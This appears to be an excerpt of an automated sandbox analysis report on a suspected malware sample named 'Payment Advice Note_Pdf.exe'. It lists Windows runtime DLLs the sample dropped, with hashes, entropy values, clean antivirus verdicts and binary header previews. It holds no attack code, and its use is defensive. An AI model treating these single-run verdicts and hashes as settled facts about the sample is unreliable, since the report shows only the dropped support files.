Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Payment Advice Note_Pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
